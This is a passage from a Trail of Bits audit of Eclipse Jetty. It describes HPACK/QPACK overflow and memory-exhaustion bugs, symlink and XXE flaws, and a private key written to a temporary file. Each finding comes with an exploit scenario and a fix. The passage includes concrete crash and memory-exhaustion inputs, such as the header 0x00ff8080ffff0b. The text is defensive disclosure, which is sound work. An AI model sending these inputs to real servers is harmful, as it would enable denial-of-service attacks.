Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25 Target: ● org.eclipse.jetty.http3.qpack.QpackDecoder ● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructi onParser ● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable Description In QPACK, an encoder can set the dynamic table capacity of the decoder using a “Set Dynamic Table Capacity” instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Java’s maximum integer value), allowing it to take up large amounts of space on the decoder’s memory. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a “Set Dynamic Table Capacity” instruction, setting the dynamic table capacity to Java’s maximum integer value, 2 31-1 (2.1 GB). He then repeatedly enters very large values into the server’s dynamic table using an “Insert with Literal Name” instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty’s implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment +9. Risk of integer overflow in HPACK's NBitInteger.decode Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-9 Target: org.eclipse.jetty.http2.hpack.internal.NBitInteger Description The static function NBitInteger.decode is used to decode bytestrings in HPACK's integer format. It should return only positive integers since HPACK’s integer format is not intended to support negative numbers. However, the following loop in NBitInteger.decode is susceptible to integer overflows in its multiplication and addition operations: public static int decode (ByteBuffer buffer, int n) { if (n == 8 ) { // ... } int nbits = 0xFF >>> ( 8 - n); int i = buffer.get(buffer.position() - 1 ) & nbits; if (i == nbits) { int m = 1 ; int b; do { b = 0xff & buffer.get(); i = i + (b & 127 ) * m; m = m * 128 ; } while ((b & 128 ) == 128 ); } return i; } Figure 9.1: NBitInteger.java , lines 105–145 For example, NBitInteger.decode(0xFF8080FFFF0F, 7) returns -16257 . Any overflow that occurs in the function would not be a problem on its own since, in general, the output of this function ought to be validated before it is used; however, when coupled with other issues (refer to TOB-JETTY-10 ), an overflow can cause vulnerabilities. 49 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, modify NBitInteger.decode to check that its result is nonnegative before returning it. Long term, consider merging the QPACK and HPACK implementations for NBitInteger , since they perform the same functionality; the QPACK implementation of NBitInteger checks for overflows. 50 OSTIF Eclipse: Jetty Security Assessment +10. MetaDataBuilder.checkSize accepts headers of negative lengths Severity: Medium Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-10 Target: org.eclipse.jetty.http2.hpack.internal.MetaDataBuilder Description The MetaDataBuilder.checkSize function accepts user-entered HPACK header values of negative sizes, which could cause a very large buffer to be allocated later when the user-entered size is multiplied by 2. MetaDataBuilder.checkSize determines whether a header name or value exceeds the size limit and throws an exception if the limit is exceeded: public void checkSize ( int length, boolean huffman) throws SessionException { // Apply a huffman fudge factor if (huffman) length = (length * 4 ) / 3 ; if ((_size + length) > _maxSize) throw new HpackException.SessionException( "Header too large %d > %d" , _size + length, _maxSize); } Figure 10.1: MetaDataBuilder.java , lines 291–298 However, it does not throw an exception if the size is negative. Later, the Huffman.decode function multiplies the user-entered length by 2 before allocating a buffer: public static String decode (ByteBuffer buffer, int length) throws HpackException.CompressionException { Utf8StringBuilder utf8 = new Utf8StringBuilder(length * 2 ); // ... Figure 10.2: Huffman.java , lines 357–359 This means that if a user provides a negative length value (or, more precisely, a length value that becomes negative when multiplied by the 4/3 fudge factor), and this length value becomes a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. 51 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ff8080ffff0b . Each time this header is decoded, the following occurs: ● HpackDecode.decode determines that a Huffman-coded value of length -1073758081 needs to be decoded. ● MetaDataBuilder.checkSize approves this length. ● The number is multiplied by 2, resulting in 2147451134 , and Huffman.decode allocates a 2.1 GB string array. ● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by adding valid Huffman-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that the given length is positive directly before adding it to _size and comparing it with _maxSize . Long term, add checks for integer overflows in Huffman.decode and in NBitInteger.decode (refer to TOB-JETTY-9 ) for added redundancy. 52 OSTIF Eclipse: Jetty Security Assessment 11. Insucient space allocated when encoding QPACK instructions and entries Severity: Low Difficulty: High Type: Denial of Service Finding ID: TOB-JETTY-11 Target: ● org.eclipse.jetty.http3.qpack.internal.instruction.IndexedName EntryInstruction ● org.eclipse.jetty.http3.qpack.internal.instruction.LiteralName EntryInstruction ● org.eclipse.jetty.http3.qpack.internal.instruction.EncodableEn try Description Multiple expressions do not allocate enough buffer space when encoding QPACK instructions and entries, which could result in a buffer overflow exception. In IndexedNameEntry , the following expression determines how much space to allocate when encoding the instruction: int size = NBitIntegerEncoder.octetsNeeded( 6 , _index) + (_huffman ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2 ; Figure 11.1: IndexedNameEntry.java , line 58 Later, the following two lines encode the value size for Huffman-coded and non-Huffman-coded strings, respectively: NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); // ... NBitIntegerEncoder.encode(byteBuffer, 7 , _value.length()); Figure 11.2: IndexedNameEntry.java , lines 71 and 77 These encodings can take up more than 1 byte if the value’s length is over 126 because the number will fill up the 7 bits given to it in the first byte. However, the int size expression in figure 11.1 assumes that it will take up only 1 byte. Thus, if the value’s length is over 126, too few bytes may be allocated for the instruction, causing a buffer overflow. The same problem occurs in LiteralNameEntryInstruction : 53 OSTIF Eclipse: Jetty Security Assessment int size = (_huffmanName ? HuffmanEncoder.octetsNeeded(_name) : _name.length()) + (_huffmanValue ? HuffmanEncoder.octetsNeeded(_value) : _value.length()) + 2 ; Figure 11.3: LiteralNameEntryInstruction.java , lines 59–60 This expression assumes that the name's length will fit into 5 bits and that the value’s length will fit into 7 bits. If the name’s length is over 30 bytes or the value’s length is over 126 bytes, these assumptions will be false and too little space may be allocated for the instruction, which could cause a buffer overflow. A similar problem occurs in EncodableEntry.ReferencedNameEntry . The getRequiredSize method in this file calculates how much space should be allocated for its encoding: public int getRequiredSize ( int base) { String value = getValue(); int relativeIndex = _nameEntry.getIndex() - base; int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length(); return 1 + NBitIntegerEncoder.octetsNeeded( 4 , relativeIndex) + 1 + NBitIntegerEncoder.octetsNeeded( 7 , valueLength) + valueLength; } Figure 11.4: EncodableEntry.java , lines 181–187 The method returns the wrong size if the value is longer than 126 bytes. Additionally, it assumes that the name will use a post-base reference rather than a normal one, which may be incorrect. An additional problem is present in this method. It assumes that value ’s length in bytes will be returned by value.length() . However, value.length() measures the number of characters in value , not the number of bytes, so if value contains multibyte characters (e.g., UTF-8), too few bytes will be allocated. The length of value should be calculated by using value.getBytes() instead of value.length() . The getRequiredSize method in EncodableEntry.LiteralEntry also incorrectly uses value.length() : public int getRequiredSize ( int base) { String name = getName(); String value = getValue(); int nameLength = _huffman ? HuffmanEncoder.octetsNeeded(name) : name.length(); int valueLength = _huffman ? HuffmanEncoder.octetsNeeded(value) : value.length(); return 2 + NBitIntegerEncoder.octetsNeeded( 3 , nameLength) + nameLength + NBitIntegerEncoder.octetsNeeded( 7 , valueLength) + valueLength; 54 OSTIF Eclipse: Jetty Security Assessment } Figure 11.5: EncodableEntry.java , lines 243–250 Note that name.length() is used to measure the byte length of name , and value.length() is used to measure the byte length of value . Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Recommendations Short term, change the relevant expressions to account for the extra length. Long term, build out additional test cases for QPACK and other parsers used in HTTP/3 to test for the correct handling of edge cases and identify memory handling exceptions. 55 OSTIF Eclipse: Jetty Security Assessment 12. LiteralNameEntryInstruction incorrectly encodes value length Severity: Medium Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-12 Target: org.eclipse.jetty.http3.qpack.internal.instruction.LiteralNameEntryI nstruction Description QPACK instructions for inserting entries with literal names and non-Huffman-coded values will be encoded incorrectly when the value’s length is over 30, which could cause values to be sent incorrectly or errors to occur during decoding. The following snippet of the LiteralNameEntryInstruction.encode function is responsible for encoding the header value: if (_huffmanValue) byteBuffer.put(( byte )( 0x80 )); NBitIntegerEncoder.encode(byteBuffer, 7 , HuffmanEncoder.octetsNeeded(_value)); HuffmanEncoder.encode(byteBuffer, _value); 78 79 { 80 81 82 83 } 84 85 { 86 87 88 89 } else byteBuffer.put(( byte )( 0x00 )); NBitIntegerEncoder.encode(byteBuffer, 5 , _value.length()); byteBuffer.put(_value.getBytes()); Figure 12.1: LiteralNameEntryInstruction.java , lines 78–89 On line 87, 5 is the second parameter to NBitIntegerEncoder.encode , indicating that the number will take up 5 bits in the first encoded byte; however, the second parameter should be 7 instead. This means that when _value.length() is over 30, it will be incorrectly encoded. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. 56 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the second parameter of the NBitIntegerEncoder.encode function from 5 to 7 in order to reflect that the number will take up 7 bits. Long term, write more tests to catch similar encoding/decoding problems. 57 OSTIF Eclipse: Jetty Security Assessment 13. FileInitializer does not check for symlinks Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-13 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. During this process, the FileInitializer class validates the destination path and throws an IOException exception if the destination is outside the ${jetty.base} directory. However, this validation routine does not check for symlinks: // now on copy/download paths (be safe above all else) if (destination != null && !destination.startsWith(_basehome.getBasePath())) throw new IOException( "For security reasons, Jetty start is unable to process file resource not in ${jetty.base} - " + location); Figure 13.1: FileInitializer.java , lines 112–114 None of the subclasses of FileInitializer check for symlinks either. Thus, if the ${jetty.base} directory contains a symlink, a file path in a module’s .ini file beginning with the symlink name will pass the validation check, and the file will be written to a subdirectory of the symlink’s destination. Exploit Scenario A system’s ${jetty.base} directory contains a symlink called dir , which points to /etc . The system administrator enables a Jetty module whose .ini file contains a [files] entry that downloads a remote file and writes it to the relative path dir/config.conf . The filesystem follows the symlink and writes a new configuration file to /etc/config.conf , which impacts the server’s system configuration. Additionally, since the FileInitializer class uses the REPLACE_EXISTING flag, this behavior overwrites an existing system configuration file. Recommendations Short term, rewrite all path checks in FileInitializer and its subclasses to include a call to the Path.toRealPath function, which, by default, will resolve symlinks and produce the real filesystem path pointed to by the Path object. If this real path is outside ${jetty.base} , the file write operation should fail. 58 OSTIF Eclipse: Jetty Security Assessment Long term, consolidate all filesystem operations involving the ${jetty.base} or ${jetty.home} directories into a single centralized class that automatically performs symlink resolution and rejects operations that attempt to read from or write to an unauthorized directory. This class should catch and handle the IOException exception that is thrown in the event of a link loop or a large number of nested symlinks. 59 OSTIF Eclipse: Jetty Security Assessment 14. FileInitializer permits downloading files via plaintext HTTP Severity: High Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-14 Target: org.eclipse.jetty.start.FileInitializer Description Module configuration files can direct Jetty to download a remote file and save it in the local filesystem while initializing the module. If the specified URL is a plaintext HTTP URL, Jetty does not raise an error or warn the user. Transmitting files over plaintext HTTP is intrinsically unsecure and exposes sensitive data to tampering and eavesdropping in transit. Exploit Scenario A system administrator enables a Jetty module that downloads a remote file over plaintext HTTP during initialization. An attacker with a network intermediary position sniffs the traffic and infers sensitive information about the design and configuration of the Jetty system under configuration. Alternatively, the attacker actively tampers with the file during transmission from the remote server to the Jetty installation, which enables the attacker to alter the module’s behavior and launch other attacks against the targeted system. Recommendations Short term, add a check to the FileInitializer class and its subclasses to prohibit downloads over plaintext HTTP. Additionally, add a validation check to the module .ini file parser to reject any configuration that includes a plaintext HTTP URL in the [files] section. Long term, consolidate all remote file downloads conducted during module configuration operations into a single centralized class that automatically rejects plaintext HTTP URLs. If current use cases require support of plaintext HTTP URLs, then at a minimum, have Jetty display a prominent warning message and prompt the user for manual confirmation before performing the unencrypted download. 60 OSTIF Eclipse: Jetty Security Assessment 15. NullPointerException thrown by FastCGI parser on invalid frame type Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-15 Target: org.eclipse.jetty.fcgi.parser.Parser Description Because of a missing null check, the Jetty FastCGI client’s Parser class throws a NullPointerException exception when parsing a frame with an invalid frame type field. This exception occurs because the findContentParser function returns null when it does not have a ContentParser object matching the specified frame type, and the caller never checks the findContentParser return value for null before dereferencing it. case CONTENT: { ContentParser contentParser = findContentParser(headerParser.getFrameType()); if (headerParser.getContentLength() == 0 ) { padding = headerParser.getPaddingLength(); state = State.PADDING; if (contentParser.noContent()) return true ; } else { ContentParser.Result result = contentParser.parse(buffer); // ...[snip]... } break ; } Figure 15.1: Parser.java , lines 82–114 Exploit Scenario An attacker operates a malicious web server that supports FastCGI. A Jetty application communicates with this server by using Jetty’s built-in FastCGI client. The remote server transmits a frame with an invalid frame type, causing a NullPointerException exception and a crash in the Jetty application. Recommendations Short term, add a null check to the parse function to abort the parsing process before dereferencing a null return value from findContentParser . If a null value is detected, 61 OSTIF Eclipse: Jetty Security Assessment parse should throw an appropriate exception, such as IllegalStateException , that Jetty can catch and handle safely. Long term, build out a larger suite of test cases that ensures graceful handling of malformed traffic and data. 62 OSTIF Eclipse: Jetty Security Assessment 16. Documentation does not specify that request contents and other user data can be exposed in debug logs Severity: Medium Difficulty: High Type: Data Exposure Finding ID: TOB-JETTY-16 Target: Jetty 12 Operations Guide; numerous locations throughout the codebase Description Over 100 times, the system calls LOG.debug with a parameter of the format BufferUtil.toDetailString(buffer) , which outputs up to 56 bytes of the buffer into the log file. Jetty’s implementations of various protocols and encodings, including GZIP, WebSocket, multipart encoding, and HTTP/2, output user data received over the network to the debug log using this type of call. An example instance from Jetty’s WebSocket implementation appears in figure 16.1. public Frame.Parsed parse (ByteBuffer buffer) throws WebSocketException { try { // parse through while (buffer.hasRemaining()) { if (LOG.isDebugEnabled()) LOG.debug( "{} Parsing {}" , this , BufferUtil.toDetailString(buffer)); // ...[snip]... } // ...[snip]... } // ...[snip]... } Figure 16.1: Parser.java , lines 88–96 Although the Jetty 12 Operations Guide does state that Jetty debugging logs can quickly consume massive amounts of disk space, it does not advise system administrators that the logs can contain sensitive user data, such as personally identifiable information. Thus, the possibility of raw traffic being captured from debug logs is undocumented. Exploit Scenario A Jetty system administrator turns on debug logging in a production environment. During the normal course of operation, a user sends traffic containing sensitive information, such as personally identifiable information or financial data, and this data is recorded to the 63 OSTIF Eclipse: Jetty Security Assessment debug log. An attacker who gains access to this log can then read the user data, compromising data confidentiality and the user’s privacy rights. Recommendations Short term, update the Jetty Operations Guide to state that in addition to being extremely large, debug logs can contain sensitive user data and should be treated as sensitive. Long term, consider moving all debugging messages that contain buffer excerpts into a high-detail debug log that is enabled only for debug builds of the application. 64 OSTIF Eclipse: Jetty Security Assessment 17. HttpStreamOverFCGI internally marks all requests as plaintext HTTP Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-17 Target: org.eclipse.jetty.fcgi.server.internal.HttpStreamOverFCGI Description The HttpStreamOverFCGI class processes FastCGI messages in a format that can be processed by other system components that use the HttpStream interface. This class’s onHeaders callback mistakenly marks each MetaData.Request object as a plaintext HTTP request, as the “TODO” comment shown in figure 17.1 indicates: public void onHeaders () { String pathQuery = URIUtil.addPathQuery(_path, _query); // TODO https? MetaData.Request request = new MetaData.Request(_method, HttpScheme.HTTP.asString(), hostPort, pathQuery, HttpVersion.fromString(_version), _headers, Long.MIN_VALUE); // ...[snip]... } Figure 17.1: HttpStreamOverFCGI.java , lines 108–119 In some configurations, other Jetty components could misinterpret a message received over FCGI as a plaintext HTTP message, which could cause a request to be incorrectly rejected, redirected in an infinite loop, or forwarded to another system over a plaintext HTTP channel instead of HTTPS. Exploit Scenario A Jetty instance runs an FCGI server and uses the HttpStream interface to process messages. The MetaData.Request class’s getURI method is used to check the incoming request’s URI. This method mistakenly returns a plaintext HTTP URL due to the bug in HttpStreamOverFCGI.java . One of the following takes place during the processing of this request: ● ● An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application rejects the request and refuses to process it, causing a denial of service. An application-level security control checks the incoming request’s URI to ensure it was received over a TLS-encrypted channel. Since this check fails, the application 65 OSTIF Eclipse: Jetty Security Assessment attempts to redirect the user to a suitable HTTPS URL. The check fails on this redirected request as well, causing an infinite redirect loop and a denial of service. ● An application processing FCGI messages acts as a proxy, forwarding certain requests to a third HTTP server. It uses MetaData.Request.getURI to check the request’s original URI and mistakenly sends a request over plaintext HTTP. Recommendations Short term, correct the bug in HttpStreamOverFCGI.java to generate the correct URI for the incoming request. Long term, consider streamlining the HTTP implementation to minimize the need for different classes to generate URIs from request data. 66 OSTIF Eclipse: Jetty Security Assessment 18. Excessively permissive and non-standards-compliant error handling in HTTP/2 implementation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-18 Target: The org.eclipse.jetty.http2.parser and org.eclipse.jetty.http2.parser packages Description Jetty’s HTTP/2 implementation violates RFC 9113 in that it fails to terminate a connection with an appropriate error code when the remote peer sends a frame with one of the following protocol violations: ● ● ● A SETTINGS frame with the ACK flag set and a nonzero payload length A PUSH_PROMISE frame in a stream with push disabled A GOAWAY frame with its stream ID not set to zero None of these situations creates an exploitable vulnerability. However, noncompliant protocol implementations can create compatibility problems and could cause vulnerabilities when deployed in combination with other misconfigured systems. Exploit Scenario A Jetty instance connects to an HTTP/2 server, or serves a connection from an HTTP/2 client, and the remote peer sends traffic that should cause Jetty to terminate the connection. Instead, Jetty keeps the connection alive, in violation of RFC 9113. If the remote peer is programmed to handle the noncompliant traffic differently than Jetty, further problems could result, as the two implementations interpret protocol messages differently. Recommendations Short term, update the HTTP/2 implementation to check for the following error conditions and terminate the connection with an error code that complies with RFC 9113: ● ● A peer receives a SETTINGS frame with the ACK flag set and a payload length greater than zero. A client receives a PUSH_PROMISE frame after having sent, and received an acknowledgement for, a SETTINGS frame with SETTINGS_ENABLE_PUSH equal to zero. 67 OSTIF Eclipse: Jetty Security Assessment ● A peer receives a GOAWAY frame with the stream identifier field not set to zero. Long term, audit Jetty’s implementation of HTTP/2 and other protocols to ensure that Jetty handles errors in a standards-compliant manner and terminates connections as required by the applicable specifications. 68 OSTIF Eclipse: Jetty Security Assessment 19. XML external entities and entity expansion in Maven package metadata parser Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-19 Target: org.eclipse.jetty.start.fileinits.MavenMetadata Description During module initialization, the MavenMetadata class parses maven-metadata.xml files when the module configuration includes a maven:// URI in its [files] section. The DocumentBuilderFactory class is used with its default settings, meaning that document type definitions (DTD) are allowed and are applied. This behavior leaves the MavenMetadata class vulnerable to XML external entity (XXE) and XML entity expansion (XEE) attacks. These vulnerabilities could enable a variety of exploits, including server-side request forgery on the server’s local network and arbitrary file reads from the server’s filesystem. Exploit Scenario An attacker causes a Jetty installation to parse a maliciously crafted maven-metadata.xml file, such as by uploading a malicious package to a Maven repository, inducing an out-of-band download of the malicious package through social engineering, or by placing the maven-metadata.xml file on the server’s filesystem through other means. When the XML file is parsed, the XML-based attack is launched. The attacker could leverage this vector to do any of the following: ● ● ● Induce HTTP requests to servers on the server’s local network Read and exfiltrate arbitrary files on the server’s filesystem Consume excessive system resources with an XEE, causing a denial of service Recommendations Short term, disable parsing of DTDs in MavenMetadata so that maven-metadata.xml files cannot be used as a vector for XML-based attacks. Disabling DTDs may require knowledge of the underlying XML parser implementation returned by the DocumentBuilderFactory class. Long term, review default configurations and attributes supported by XML parsers that may be returned by the DocumentBuilderFactory to ensure that DTDs are properly disabled. 69 OSTIF Eclipse: Jetty Security Assessment 20. Use of deprecated AccessController class Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-20 Target: ● org.eclipse.jetty.logging.JettyLoggerConfiguration ● org.eclipse.jetty.util.MemoryUtils ● org.eclipse.jetty.util.TypeUtil ● org.eclipse.jetty.util.thread.PrivilegedThreadFactory ● org.eclipse.jetty.ee10.servlet.ServletContextHandler ● org.eclipse.jetty.ee9.nested.ContextHandler Description The classes listed in the “Target” cell above use the java.security.AccessController class, which is a deprecated class slated to be removed in a future Java release. The java.security library documentation states that the AccessController class “is only useful in conjunction with the Security Manager,” which is also deprecated. Thus, the use of AccessController no longer serves any beneficial purpose. The use of this deprecated class could impact Jetty’s compatibility with future releases of the Java SDK. Recommendations Short term, remove all uses of the AccessController class. Long term, audit the Jetty codebase for the use of classes in the java.security package that may not provide any value in Jetty 12, and remove all references to those classes. 70 OSTIF Eclipse: Jetty Security Assessment 21. QUIC server writes SSL private key to temporary plaintext file Severity: High Difficulty: High Type: Cryptography Finding ID: TOB-JETTY-21 Target: org.eclipse.jetty.quic.server.QuicServerConnector Description Jetty’s QUIC implementation uses quiche, a QUIC and HTTP/3 library maintained by Cloudflare. When the server’s SSL certificate is handed off to quiche, the private key is extracted from the existing keystore and written to a temporary plaintext PEM file: protected void doStart () throws Exception { // ...[snip]... char [] keyStorePassword = sslContextFactory.getKeyStorePassword().toCharArray(); String keyManagerPassword = sslContextFactory.getKeyManagerPassword(); SSLKeyPair keyPair = new SSLKeyPair( sslContextFactory.getKeyStoreResource().getPath(), sslContextFactory.getKeyStoreType(), keyStorePassword, alias, keyManagerPassword == null ? keyStorePassword : keyManagerPassword.toCharArray() ); File[] pemFiles = keyPair.export( new File(System.getProperty( "java.io.tmpdir" ))); privateKeyFile = pemFiles[ 0 ]; certificateChainFile = pemFiles[ 1 ]; } Figure 21.1: QuicServerConnector.java , lines 154–179 Storing the private key in this manner exposes it to increased risk of theft. Although the QuicServerConnector class deletes the private key file upon stopping the server, this deleted file may not be immediately removed from the physical storage medium, exposing the file to potential theft by attackers who can access the raw bytes on the disk. A review of quiche suggests that the library’s API may not support reading a DES-encrypted keyfile. If that is true, then remediating this issue would require updates to the underlying quiche library. 71 OSTIF Eclipse: Jetty Security Assessment Exploit Scenario An attacker gains read access to a Jetty HTTP/3 server’s temporary directory while the server is running. The attacker can retrieve the temporary keyfile and read the private key without needing to obtain or guess the encryption key for the original keystore. With this private key in hand, the attacker decrypts and tampers with all TLS communications that use the associated certificate. Recommendations Short term, investigate the quiche library’s API to determine whether it can readily support password-encrypted private keyfiles. If so, update Jetty to save the private key in a temporary password-protected file and to forward that password to quiche. Alternatively, if password-encrypted private keyfiles can be supported, have Jetty pass the unencrypted private key directly to quiche as a function argument. Either option would obviate the need to store the key in a plaintext file on the server’s filesystem. If quiche does not support either of these changes, open an issue or pull request for quiche to implement a fix for this issue. 72 OSTIF Eclipse: Jetty Security Assessment 22. Repeated code between HPACK and QPACK Severity: Informational Difficulty: N/A Type: Code Quality Finding ID: TOB-JETTY-22 Target: ● org.eclipse.jetty.http2.hpack.internal.NBitInteger ● org.eclipse.jetty.http2.hpack.internal.Huffman ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerParser ● org.eclipse.jetty.http3.qpack.internal.util.NBitIntegerEncode ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanDecoder ● org.eclipse.jetty.http3.qpack.internal.util.HuffmanEncoder Description Classes for dealing with n-bit integers and Huffman coding are implemented both in the jetty-http2-hpack and in jetty-http3-qpack libraries. These classes have very similar functionality but are implemented in two different places, sometimes with identical code and other times with different implementations. In some cases ( TOB-JETTY-9 ), one implementation has a bug that the other implementation does not have. The codebase would be easier to maintain and keep secure if the implementations were merged. Exploit Scenario A vulnerability is found in the Huffman encoding implementation, which has identical code in HPACK and QPACK. The vulnerability is fixed in one implementation but not the other, leaving one of the implementations vulnerable. Recommendations Short term, merge the two implementations of n-bit integers and Huffman coding classes. Long term, audit the Jetty codebase for other classes with very similar functionality. 73 OSTIF Eclipse: Jetty Security Assessment 23. Various exceptions in HpackDecoder.decode and QpackDecoder.decode Severity: Informational Difficulty: N/A Type: Denial of Service Finding ID: TOB-JETTY-23 Target: org.eclipse.jetty.http2.hpack.HpackDecoder , org.eclipse.jetty.http3.qpack.QpackDecoder Description The HpackDecoder and QpackDecoder classes both throw unexpected Java-level exceptions: ● HpackDecoder.decode(0x03) throws BufferUnderflowException . ● HpackDecoder.decode(0x4800) throws NumberFormatException . ● HpackDecoder.decode(0x3fff 2e) throws IllegalArgumentException . ● HpackDecoder.decode(0x3fff 81ff ff2e) throws NullPointerException . ● HpackDecoder.decode(0xffff ffff f8ff ffff ffff ffff ffff ffff ffff ffff ffff ffff 0202 0000) throws ArrayIndexOutOfBoundsException . ● QpackDecoder.decode(..., 0x81, ...) throws IndexOutOfBoundsException . ● QpackDecoder.decode(..., 0xfff8 ffff f75b, ...) throws ArithmeticException . For both HPACK and QPACK, these exceptions appear to be caught higher up in the call chain by catch (Throwable x) statements every time the decode functions are called. However, catching them within decode and throwing a Jetty-level exception within the catch statement would result in cleaner, more robust code. Exploit Scenario Jetty developers refactor the codebase, moving function calls around and introducing a new point in the code where HpackDecoder.decode is called. Assuming that decode will throw only org.jetty… errors, they forget to wrap this call in a catch (Throwable x) statement. This results in a DoS vulnerability. Recommendations Short term, document in the code that Java-level exceptions can be thrown. Long term, modify the decode functions so that they throw only Jetty-level exceptions. 74 OSTIF Eclipse: Jetty Security Assessment 24. Incorrect QPACK encoding when multi-byte characters are used Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-24 Target: org.eclipse.jetty.http3.qpack.internal.EncodableEntry Description Java’s string.length() function returns the number of characters in a string, which can be different from the number of bytes returned by the string.getBytes() function. However, QPACK encoding methods assume that they return the same number, which could cause incorrect encodings. In EncodableEntry.LiteralEntry , which is used to encode HTTP/3 header fields, the following method is used for encoding: public void encode (ByteBuffer buffer, int base) 214 215 { 216 byte allowIntermediary = 0x00 ; // TODO: this is 0x10 bit, when should this be set? 217 218 219 220 221 222 223 224 String name = getName(); String value = getValue(); // Encode the prefix code and the name. if (_huffman) { buffer.put(( byte )( 0x28 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , HuffmanEncoder.octetsNeeded(name)); 225 226 227 HuffmanEncoder.encode(buffer, name); buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); 228 229 230 231 232 HuffmanEncoder.encode(buffer, value); } else { // TODO: What charset should we be using? (this applies to the instruction generators as well). 233 234 235 236 237 238 buffer.put(( byte )( 0x20 | allowIntermediary)); NBitIntegerEncoder.encode(buffer, 3 , name.length()); buffer.put(name.getBytes()); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); 75 OSTIF Eclipse: Jetty Security Assessment 239 240 } } Figure 24.1: EncodableEntry.java , lines 214–240 Note in particular lines 232–238, which are used to encode literal (non-Huffman-coded) names and values. The value returned by name.length() is added to the bytestring, followed by the value returned by name.getBytes() . Then, the value returned by value.length() is added to the bytestring, followed by the value returned by value.getBytes() . When this bytestring is decoded, the decoder will read the name length field and then read that many bytes as the name. If multibyte characters were used in the name field, the decoder will read too few bytes. The rest of the bytestring will also be decoded incorrectly, since the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164–177 If value has multibyte characters, it will be incorrectly encoded in lines 174–176. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment 25. No limits on maximum capacity in QPACK decoder Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25 Target: ● org.eclipse.jetty.http3.qpack.QpackDecoder ● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructi onParser ● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable Description In QPACK, an encoder can set the dynamic table capacity of the decoder using a “Set Dynamic Table Capacity” instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Java’s maximum integer value), allowing it to take up large amounts of space on the decoder’s memory. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a “Set Dynamic Table Capacity” instruction, setting the dynamic table capacity to Java’s maximum integer value, 2 